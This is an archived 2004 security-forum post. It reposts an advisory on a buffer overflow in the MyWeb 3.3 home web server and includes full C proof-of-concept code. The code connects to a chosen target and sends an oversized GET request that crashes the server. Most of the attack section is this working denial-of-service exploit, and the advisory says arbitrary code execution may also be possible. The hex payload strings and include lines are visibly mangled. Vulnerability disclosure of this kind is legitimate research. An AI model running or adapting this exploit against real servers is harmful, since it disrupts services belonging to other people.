Myweb 3.3 Buffer Overflow

GovernmentSecurity.org > The Archives > Exploit Articles

qcred11

May 7 2004, 02:47 PM

QUOTE

MyWeb is a portable web server for home use. You can start your web site on your PC whith in a few seoncds. MyWeb is the ideal tool for sharing photos, mp3s, as well as random files and folders with friends and relatives through HTTP. A buffer overflow vulnerability exists within MyWeb 3.3 which causes the web service to stop responding, and or its possible to execute arbitrary code. Read more, or go here to read the full advisory...

SP Research Labs Advisory x11
-----------------------------

MyWeb 3.3 Buffer Overflow
-----------------------------------------

Vendor Home Page:
http://www.xuebrothers.net/myweb/myweb.htm

Date Released - 5.6.2004

--------------------------------------
Product Description from the vendor:

MyWeb is a portable web server for home use. You can start your web site on your PC whith in a few seoncds. MyWeb is the ideal tool for sharing photos, mp3s, as well as random files and folders with friends and relatives through HTTP.

--------
Details:

A specifically crafted HTTP GET request which contains over 4096 bytes of data will cause the HTTP server to crash. It may be possible to execute arbitrary code. Previous versions may also be affected by this vulnerability. Please see the PoC for the HTTP GET request which causes the crash.

--------
Exploit:

Attached to this advisory is very basic PoC code which only causes the HTTP server to crash.

--------------
Tested on:
WindowsXP SP1
Windows 2000 SP4

/****************************/
PoC to crash the server
/****************************/

/* MyWeb 3.3 Buffer Overflow
vendor:
http://www.xuebrothers.net/myweb/myweb.htm

coded and discovered by:
badpack3t
for .:sp research labs:.
www.security-protocols.com
5.6.2004

usage:
sp-myweb3.3 [targetport] (default is 80)

This PoC will only DoS the server to verify if it is vulnerable.
*/

#include <'winsock2.h'>
#include <'stdio.h'>

#pragma comment(lib, "ws2_32.lib")

char exploit[] =

"x47x45x54x20x2fx41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x01x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x2e"
"x68x74x6dx6cx20x48x54x54x50x2fx31x2ex31x0dx0ax52"
"x65x66x65x72x65x72x3ax20x68x74x74x70x3ax2fx2fx6c"
"x6fx63x61x6cx68x6fx73x74x2fx66x75x78x30x72x0dx0a"
"x43x6fx6ex74x65x6ex74x2dx54x79x70x65x3ax20x61x70"
"x70x6cx69x63x61x74x69x6fx6ex2fx78x2dx77x77x77x2d"
"x66x6fx72x6dx2dx75x72x6cx65x6ex63x6fx64x65x64x0d"
"x0ax43x6fx6ex6ex65x63x74x69x6fx6ex3ax20x4bx65x65"
"x70x2dx41x6cx69x76x65x0dx0ax55x73x65x72x2dx41x67"
"x65x6ex74x3ax20x4dx6fx7ax69x6cx6cx61x2fx34x2ex37"
"x36x20x5bx65x6ex5dx20x28x58x31x31x3bx20x55x3bx20"
"x4cx69x6ex75x78x20x32x2ex34x2ex32x2dx32x20x69x36"
"x38x36x29x0dx0ax56x61x72x69x61x62x6cx65x3ax20x72"
"x65x73x75x6cx74x0dx0ax48x6fx73x74x3ax20x6cx6fx63"
"x61x6cx68x6fx73x74x0dx0ax43x6fx6ex74x65x6ex74x2d"
"x6cx65x6ex67x74x68x3ax20x35x31x33x0dx0ax41x63x63"
"x65x70x74x3ax20x69x6dx61x67x65x2fx67x69x66x2cx20"
"x69x6dx61x67x65x2fx78x2dx78x62x69x74x6dx61x70x2c"
"x20x69x6dx61x67x65x2fx6ax70x65x67x2cx20x69x6dx61"
"x67x65x2fx70x6ax70x65x67x2cx20x69x6dx61x67x65x2f"
"x70x6ex67x0dx0ax41x63x63x65x70x74x2dx45x6ex63x6f"
"x64x69x6ex67x3ax20x67x7ax69x70x0dx0ax41x63x63x65"
"x70x74x2dx43x68x61x72x73x65x74x3ax20x69x73x6fx2d"
"x38x38x35x39x2dx31x2cx2ax2cx75x74x66x2dx38x0dx0a"
"x0dx0ax77x68x61x74x79x6fx75x74x79x70x65x64x3dx3f"
"x0dx0a";

int main(int argc, char *argv[])
{
WSADATA wsaData;
WORD wVersionRequested;
struct hostent *pTarget;
struct sockaddr_in sock;
char *target;
int port,bufsize;
SOCKET mysocket;

if (argc < 2)
{
printf("MyWeb 3.3 Buffer Overflow by badpack3t
", argv[0]);
printf("Usage: %s [targetport] (default is 80) ",
argv[0]);
printf("www.security-protocols.com ", argv[0]);
exit(1);
}

wVersionRequested = MAKEWORD(1, 1);
if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1;

target = argv[1];
port = 80;

if (argc >= 3) port = atoi(argv[2]);
bufsize = 1024;
if (argc >= 4) bufsize = atoi(argv[3]);

mysocket = socket(AF_INET, SOCK_STREAM, 0);
if(mysocket==INVALID_SOCKET)
{
printf("Socket error! ");
exit(1);
}

printf("Resolving Hostnames... ");
if ((pTarget = gethostbyname(target)) == NULL)
{
printf("Resolve of %s failed ", argv[1]);
exit(1);
}

memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
sock.sin_family = AF_INET;
sock.sin_port = htons((USHORT)port);

printf("Connecting... ");
if ( (connect(mysocket, (struct sockaddr *)&sock, sizeof (sock) )))
{
printf("Couldn't connect to host. ");
exit(1);
}

printf("Connected!... ");
printf("Sending Payload... ");
if (send(mysocket, exploit, sizeof(exploit)-1, 0) == -1)
{
printf("Error Sending the Exploit Payload ");
closesocket(mysocket);
exit(1);
}

printf("Payload has been sent! Check if the webserver is dead y0! ");
closesocket(mysocket);
WSACleanup();
return 0;
}

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.